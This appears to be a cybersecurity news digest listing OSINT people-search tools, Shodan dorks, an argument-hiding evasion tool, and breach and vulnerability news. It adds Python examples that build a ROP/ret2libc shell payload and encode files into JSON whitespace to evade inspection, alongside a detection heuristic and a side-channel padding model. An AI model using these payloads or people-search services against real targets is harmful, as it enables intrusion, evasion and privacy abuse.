# Latest Podcast
# Description
Today: Trail of Bits has released weAudit, a VS Code extension for code auditing. Instagram User ID Finder looks up Instagram user IDs without logging in. Kontragenta.net collects databases for verifying information about legal entities and individuals. Various OSINT tools are listed for cyber intelligence, such as people search engines and domain information aggregators. A free phone number search tool for investigating numbers is described. A researcher released a kernel exploit analysis for Android 14 on Google Pixel devices. Geowifi locates WiFi networks by BSSID or SSID. ShodanX queries Shodan without a paid API key. Firefox's privilege separation relies on JavaScript IPC, with tooling for identifying sandbox escape vulnerabilities. NoArgs hides Windows process command-line arguments. The xai-org/grok-1 repository holds the 314-billion-parameter Grok-1 model, which needs a large amount of GPU memory. Shodan is a search engine for exposed internet devices. A discussion on military technology shows a pivot to drones over traditional aircraft. Return Oriented Programming for buffer overflow exploitation and a new technique called JSON Smuggling are explained.
# Tradecraft
Trail of Bits has released weAudit, a VS Code extension designed for effective code auditing, with features for tracking findings, bookmarking code locations, collaborating with other auditors, and creating GitHub issues directly from the editor.
Instagram User ID Finder retrieves the unique numeric identifier for any Instagram account from its username, without logging in, and can also convert a user ID back into a username.
Kontragenta.net provides a regularly updated collection of links to official and private databases for verifying information on legal entities, individuals, real estate, legal disputes, construction firms, phone numbers, bank details, vehicles, and more, without storing any personal user data.
A list of OSINT tools and resources for cyber intelligence gathering: people search engines, image and face search platforms, domain and IP aggregators, forensic tools, leak databases, and more.
A free phone number search tool that investigates a number by querying various search engines with its different formats.
A security researcher has published a complete analysis and exploit for Android 14 kernel vulnerabilities on Google Pixel 7 and Pixel 8 Pro devices, including the steps to obtain root and disable SELinux.
Geowifi searches for WiFi networks by BSSID or SSID across several public databases and presents the results in different formats, such as a map or JSON.
ShodanX is a free and open-source command-line tool for gathering information about targets through Shodan without a paid API key, with several search modes and coloured output to aid analysis.
To enforce privilege separation in Firefox, engineers rely on JavaScript inter-process communication (JSIPC): JSActors for per-process and per-window messaging and the older MessageManagers for broader communication; debugging tooling helps identify sandbox escape vulnerabilities in these channels.
NoArgs hides or spoofs the command-line arguments of Windows processes by hooking the relevant API and rewriting the Process Environment Block (PEB), so that argument-based detections see a different command line.
The xai-org/grok-1 repository contains JAX code to load and run the 314-billion-parameter Grok-1 model; the weights are available via a torrent link or from HuggingFace, and running the model requires a machine with a large amount of GPU memory.
Shodan is a search engine for internet-connected devices; specific queries, known as Shodan dorks, locate webcams, databases, industrial control systems and other devices exposed through misconfiguration or security weaknesses.
A discussion of drone warfare describes a shift from expensive traditional aircraft such as the F-35A to cost-effective drones for both attack and reconnaissance, a strategic pivot in military technology and tactics.
To exploit a stack buffer overflow when the stack is not executable, adversaries use Return Oriented Programming (ROP): the overwritten return address and the stack slots after it chain together short instruction sequences ending in ret ("gadgets") that already exist in the program and its loaded libraries, so no injected code has to run and NX/DEP is bypassed. ROP does not defeat ASLR by itself; gadget and function addresses must be known, from a non-PIE binary or an information leak. The technique is demonstrated with a C program that deliberately references system() so it is linked into the binary; the ROP chain calls it to open a shell, and the process does not leave a segmentation fault in the logs.
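The gadget search and chain construction the item above describes, as an added example (not code from the article or from the demonstration it summarises). It works on a constructed byte string standing in for a binary's code section; the libc offsets, image bases and buffer size are assumptions. The chain is kept symbolic until the image bases are known, which is exactly where ASLR bites: the gadgets do not change, their addresses do.

```python
import struct

# Constructed x86-64 machine code standing in for the .text of a loaded binary.
# Sample data only: not a real executable.
FAKE_TEXT = bytes.fromhex(
    "4889e5"    # mov rbp, rsp
    "5fc3"      # pop rdi ; ret
    "90"        # nop
    "5ec3"      # pop rsi ; ret
    "c3"        # ret
    "0f05c3"    # syscall ; ret
)

# Byte patterns of the gadgets a chain builder reaches for first on x86-64.
# A real tool disassembles backwards from every 0xc3; this table is the minimal version.
GADGET_PATTERNS = {
    b"\x5f\xc3": "pop rdi ; ret",
    b"\x5e\xc3": "pop rsi ; ret",
    b"\x5a\xc3": "pop rdx ; ret",
    b"\x58\xc3": "pop rax ; ret",
    b"\x0f\x05\xc3": "syscall ; ret",
    b"\xc3": "ret",
}


def find_gadgets(code: bytes) -> dict:
    """Return {gadget: offset} for the first occurrence of each pattern.
    Every byte offset is a candidate: x86 lets a ret land in the middle of a longer instruction."""
    found = {}
    for pattern, text in GADGET_PATTERNS.items():
        off = code.find(pattern)
        if off != -1:
            found[text] = off
    return found


def symbolic_system_chain(gadgets: dict, system_off: int, binsh_off: int) -> list:
    """ret2libc chain for system("/bin/sh") under the SysV x86-64 ABI (first argument in rdi).
    Entries are (image, offset) so the chain can be resolved once the image bases are known.
    The extra bare ret keeps rsp 16-byte aligned at the call, which glibc's system() needs."""
    return [
        ("bin", gadgets["pop rdi ; ret"]),
        ("libc", binsh_off),          # pointer to the "/bin/sh" string inside libc
        ("bin", gadgets["ret"]),
        ("libc", system_off),
    ]


def resolve_chain(symbolic: list, bases: dict) -> bytes:
    """Turn (image, offset) pairs into the little-endian 64-bit values that overwrite the stack.
    Without ASLR (non-PIE binary, fixed libc base) the bases are constants; with ASLR every
    image base must come from an information leak first, which is the part ROP does not solve."""
    missing = {img for img, _ in symbolic if img not in bases}
    if missing:
        raise ValueError("need a leak for the base of: " + ", ".join(sorted(missing)))
    return b"".join(struct.pack("<Q", bases[img] + off) for img, off in symbolic)


def overflow_payload(buf_size: int, chain: bytes) -> bytes:
    """Fill the buffer, overwrite the saved rbp (8 bytes), then place the chain where the saved
    return address sits so the first gadget runs on ret. buf_size is the distance from the
    buffer start to the saved rbp (assumption: no stack canary in between)."""
    return b"A" * buf_size + b"B" * 8 + chain


if __name__ == "__main__":
    gadgets = find_gadgets(FAKE_TEXT)
    chain = symbolic_system_chain(gadgets, system_off=0x50D70, binsh_off=0x1D8678)  # assumed libc offsets
    bases = {"bin": 0x400000, "libc": 0x7F1234000000}                                # assumed image bases
    payload = overflow_payload(64, resolve_chain(chain, bases))
    print(gadgets, len(payload))
```

Calling resolve_chain with only the binary's base raises, which is the honest picture of an ASLR-enabled target: the chain is ready, the addresses are not.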
The text describes a proof of concept for a technique called JSON Smuggling: arbitrary files are encoded into invisible characters (the whitespace JSON allows between tokens) that parsers discard, so the document still parses as ordinary JSON while the payload passes through inspection that only looks at the parsed content.
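An added example of the encoding the item describes, written for this page rather than taken from the proof of concept: each payload byte becomes four of the whitespace characters JSON allows between tokens, spread over a compact carrier document, and a decoder on the other side reads them back. The carrier object, the payload bytes and the length-prefix framing are constructed here; looks_smuggled is our own detection heuristic, not part of the technique.

```python
import json

# The four characters RFC 8259 allows as insignificant whitespace between tokens.
# Each one carries a base-4 digit, so four of them encode one payload byte.
WS = " \t\n\r"
WS_INDEX = {c: i for i, c in enumerate(WS)}
STRUCTURAL = set("{}[]:,")


def _outside_strings(doc: str):
    """Yield (index, char) for every character that is not inside a JSON string literal."""
    in_str = esc = False
    for i, ch in enumerate(doc):
        if in_str:
            if esc:
                esc = False
            elif ch == "\\":
                esc = True
            elif ch == '"':
                in_str = False
            continue
        if ch == '"':
            in_str = True
            continue
        yield i, ch


def encode_smuggled(payload: bytes, carrier_obj) -> str:
    """Hide payload in the whitespace of a JSON document built from carrier_obj.
    A 4-byte big-endian length prefix (our framing) lets the decoder ignore trailing whitespace."""
    carrier = json.dumps(carrier_obj, separators=(",", ":"))  # compact: no whitespace of its own
    framed = len(payload).to_bytes(4, "big") + payload
    ws = "".join(WS[(b >> s) & 3] for b in framed for s in (6, 4, 2, 0))
    # Whitespace is legal after every structural character; spread the run over those slots.
    slots = [i + 1 for i, ch in _outside_strings(carrier) if ch in STRUCTURAL]
    per = -(-len(ws) // len(slots))  # ceiling division
    chunks = [ws[k:k + per] for k in range(0, len(ws), per)]
    out, prev = [], 0
    for slot, chunk in zip(slots, chunks):
        out.append(carrier[prev:slot])
        out.append(chunk)
        prev = slot
    out.append(carrier[prev:])
    return "".join(out)


def decode_smuggled(doc: str) -> bytes:
    """Recover the payload: every whitespace character outside strings is a base-4 digit."""
    digits = [WS_INDEX[ch] for _, ch in _outside_strings(doc) if ch in WS_INDEX]
    data = bytes(
        (digits[k] << 6) | (digits[k + 1] << 4) | (digits[k + 2] << 2) | digits[k + 3]
        for k in range(0, len(digits) - 3, 4)
    )
    if len(data) < 4:
        return b""
    n = int.from_bytes(data[:4], "big")
    return data[4:4 + n]


def parsed_view(doc: str):
    """What any downstream JSON consumer sees: the whitespace is gone."""
    return json.loads(doc)


def looks_smuggled(doc: str, max_run: int = 64) -> bool:
    """Detection heuristic (ours, not the PoC's): pretty-printers emit short runs made of a newline
    plus one kind of indentation; a run mixing three or more whitespace kinds, or longer than
    max_run, is carrying data."""
    runs, run = [], []
    for _, ch in _outside_strings(doc):
        if ch in WS_INDEX:
            run.append(ch)
        elif run:
            runs.append("".join(run))
            run = []
    if run:
        runs.append("".join(run))
    return any(len(r) > max_run or len(set(r)) >= 3 for r in runs)


# Constructed inputs: a harmless-looking API response and a fake executable header as payload.
CARRIER = {"user": "alice", "roles": ["admin"]}
PAYLOAD = bytes.fromhex("4d5a90000300000004000000ffff0000")

if __name__ == "__main__":
    doc = encode_smuggled(PAYLOAD, CARRIER)
    print(repr(doc))
    print(parsed_view(doc) == CARRIER, decode_smuggled(doc) == PAYLOAD, looks_smuggled(doc))
```

The point for defenders is in the last function: a parser-based inspection never sees the payload, so the check has to run on the raw bytes before parsing.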
# News
Radiant Earth is a non-profit that improves data sharing for community projects through initiatives such as Source Cooperative, for secure data exchange, and the Cloud-Native Geospatial Foundation, for efficient handling of geospatial data.
IDINFO is a search and analytics system that offers subscriptions to entrepreneurs, provides analytical reports, and publishes its public offer and data processing policy on its website.
The website namebook.club requires a security check confirming that a visitor is not a robot before granting access to its content.
YooSonar is a search engine for indexing and searching verified darknet resources, offering access to material that is normally hard to find, without phishing sites or irrelevant ads.
A Russian website offers a people search service built on personal data gathered from social networks and other internet sources, which raises privacy and data protection compliance concerns.
The text is mainly a list of countries with search options for profiles on the Russian social network site BigBookName.com, listing the names and locations of individuals.
The text comes from an information and search system named "Тут Найдут!" ("They'll find it here!") and consists of a long list of regions and segments for property and population searches in 2024.
VIN01.RU is a Russian website that provides free vehicle information, including registration history, accident involvement, legal status and mileage, drawn from public databases such as the traffic police and state technical inspection sites.
An analysis using Sergei Shpilkin's method suggests that around half of the votes reported for Putin in a Russian election were fraudulent, highlighting significant electoral integrity issues.
Ukrainian hackers have exposed detailed Russian plans for extensive internal reforms and further international aggression after the 2024 elections, based on leaked documents signed by Putin.
Fujitsu has announced recruitment plans, strengthened its partnership with AWS to modernise legacy applications with cloud solutions, and joined a Japanese research group to develop a high-performance computing platform built around a newly created 64-qubit quantum computer.
Cyble's latest analysis describes a new ransomware called Darkrace that resembles LockBit, targets Windows systems and uses double extortion: files are encrypted and the stolen data is threatened with publication.
The Apex Legends Global Series North American finals were delayed after players' game clients were hacked during the tournament, pointing to a possible remote code execution vulnerability that is under investigation.
A cyber attack campaign named DEEP#GOSU, suspected to be connected with the North Korean group Kimsuky, uses PowerShell and VBScript stages to infect Windows systems, evade detection and steal sensitive information, with Dropbox and Google Docs serving as command and control channels.
A significant vulnerability in the Spring Security framework for Java applications could allow unauthorised access; users must upgrade to the patched versions.
A security flaw in Podman and Buildah, CVE-2024-1753, could let an attacker reach the host filesystem during container builds; users should update to the patched versions immediately.
Fujitsu confirmed that a malware infection on its systems led to a data breach exposing customer information and is investigating the extent of the data exfiltration.
Fortra has fixed a critical vulnerability in its FileCatalyst software that allowed remote code execution on the server; users should update to the corrected version.
The Lazarus Group has laundered over $23 million of stolen funds through Tornado Cash, despite U.S. sanctions and law enforcement actions against similar crypto mixers.
Viber is investigating a claim by Handala Hack that it stole 740GB of data; other breaches have occurred at Fujitsu and Mintlify, and CrowdStrike and Nvidia have announced an AI cybersecurity collaboration.
Check Point's Threat Intelligence Bulletin reports a Nissan data breach affecting customers and an Adobe security patch, alongside analysis of malware trends and ransomware campaign tactics.
Attackers abuse Ethereum's CREATE2 opcode, whose resulting contract address can be computed before the contract exists: they get victims to approve transactions for an address that holds no code yet, so wallet security checks have nothing to flag, then deploy a malicious contract at that address and drain the victims' funds. Wallets need updated checks that treat approvals to not-yet-deployed addresses as suspicious.
The Apex Legends Global Series tournament was postponed after a cyberattack gave players unauthorised cheats, suspected to stem from a remote code execution vulnerability.
The National Vulnerability Database has not enriched new vulnerability entries with critical metadata, such as CVSS scores and affected-product data, since February 12, 2024, which hampers organisations' vulnerability management.
Researchers have found a widespread malware campaign that uses fake Google Sites pages and HTML smuggling to deliver AZORult, an infostealer that takes sensitive data and cryptocurrency wallet contents.
The aviation and aerospace sectors face a sharp increase in cyber threats, including recent LockBit 3.0 ransomware attacks on airlines and aerospace firms worldwide, prompting calls for improved cybersecurity risk assessments and proactive threat intelligence.
South Africa's pension agency GPAA is investigating a data leak after the LockBit ransomware gang claimed to have stolen and published 668GB of sensitive data; protective measures include multifactor authentication, regular backup testing, endpoint protection and vulnerability management.
Gartner analysts recommend that security teams plan and rehearse incident recovery, report small incidents to improve response, and support staff mental health to keep operations effective.
Trend Micro has identified Earth Krahang, a China-linked advanced persistent threat targeting government entities worldwide through spear phishing, exploitation of vulnerabilities and abuse of compromised infrastructure; recommendations include timely patching, phishing awareness training, zero trust and layered defences.
The International Monetary Fund confirmed that eleven of its email accounts were breached; after securing them it continues to investigate, with no signs of further compromise.
Researchers report PixPirate, an Android banking trojan targeting Brazilian users that hides its icon and runs as background services to avoid detection, and can manipulate transactions and steal credentials.
Philippine police have freed 875 people from a fraudulent online gaming company involved in romance scams, with nine arrests and the seizure of weapons, mobile phones and vehicles.
WordPress administrators should immediately delete miniOrange's Malware Scanner and Web Application Firewall plugins because of a critical flaw that lets unauthenticated attackers gain administrative privileges.
APT28, known under many other names, is running widespread phishing campaigns in multiple regions, using decoy documents and exploiting software vulnerabilities to deliver malware such as MASEPIE, OCEANMAP and STEELHOOK.
Recent cryptocurrency incidents include the multi-million dollar hack of the Remilia Collective, a significant theft from NFPrompt, an accidental burn of $1.36 million in Tether, the recovery of 90% of stolen assets by Mozaic Fi, a $2.3 million civil forfeiture action related to a romance scam, a $2 million loss to a phishing attack, extortion by the Incognito Market drug marketplace, Kickstarter's abandoned blockchain pivot influenced by a secret $100 million investment, and the theft of over $46 million through Twitter phishing in February 2024.
Two command injection vulnerabilities in TRENDnet AC2600 routers, CVE-2024-28353 and CVE-2024-28354, allow remote takeover when the remote administration feature is enabled; a firmware patch is expected by March 27th, and remote administration should be disabled until then.
Autodesk has patched critical security flaws in its design software, CVE-2024-23138 and CVE-2024-23139, which could be exploited to crash applications, steal data or take over systems.
Fujitsu has reported a malware-driven breach that compromised customer and personal information and advises affected users to change passwords, monitor their accounts and watch for phishing.
Researchers warn that SVG files are being used to deliver malware such as remote access trojans and keyloggers, and recommend proactive defences and user education against this growing vector.
Cloudflare has mitigated a token-length side channel against its AI products (Workers AI and AI Gateway): because each streamed token travels in its own encrypted record, record sizes revealed token lengths, so Cloudflare now adds variable-length padding to each JSON-streamed token. Separately, security flaws in several industrial control systems and an infostealer targeting Roblox users have prompted patch advisories and calls for user caution.
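A model of the side channel and the mitigation described above, added here as an example and not Cloudflare's code: one JSON record per streamed token, record sizes visible on the wire, and a random-length padding field that breaks the mapping from size to token length. The framing overhead, the field name p and the sample tokens are assumptions; the client strips the padding by simply ignoring the field.

```python
import json
import random

# Constant framing per streamed record (SSE "data: " prefix plus TLS record overhead).
# Assumed value; only its constancy matters for the attack.
FIXED_OVERHEAD = 29
PAD_FIELD = "p"  # padding field name, an assumption for this model


def stream(tokens, rng=None, max_pad=32):
    """One compact JSON object per token, as a streaming LLM API emits them. With an rng,
    append a random-length padding field so record length no longer tracks token length."""
    records = []
    for tok in tokens:
        obj = {"response": tok}
        if rng is not None:
            obj[PAD_FIELD] = "x" * rng.randint(1, max_pad)
        records.append(json.dumps(obj, separators=(",", ":")))
    return records


def padded_stream(tokens, seed=7, max_pad=32):
    """Deterministic padded stream for demonstration; production code uses an unpredictable source."""
    return stream(tokens, rng=random.Random(seed), max_pad=max_pad)


def wire_sizes(records):
    """What a passive observer on the network sees: TLS hides the content, not the length."""
    return [len(r.encode("utf-8")) + FIXED_OVERHEAD for r in records]


def attacker_token_lengths(sizes):
    """Unpadded, size minus the constant framing is exactly the token length; the sequence of
    token lengths is what the side channel leaks (a language model then guesses the text)."""
    base = FIXED_OVERHEAD + len('{"response":""}')
    return [s - base for s in sizes]


def client_text(records):
    """The client parses each record and ignores the padding field, so the user sees no change."""
    return "".join(json.loads(r)["response"] for r in records)


TOKENS = ["The", " patient", " was", " diagnosed", " with"]  # constructed sample stream

if __name__ == "__main__":
    print("true lengths   ", [len(t) for t in TOKENS])
    print("leaked, no pad ", attacker_token_lengths(wire_sizes(stream(TOKENS))))
    print("leaked, padded ", attacker_token_lengths(wire_sizes(padded_stream(TOKENS))))
```

With padding the observer's estimate is the token length plus a random amount, so consecutive records of the same token length no longer look alike; the padding must be random per record, not a fixed width, or the constant could simply be subtracted again.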
A hacker group has leaked personal information of 71 million AT&T customers, allegedly from a 2021 breach; AT&T denies that the data came from its systems, and affected users should watch for phishing attacks.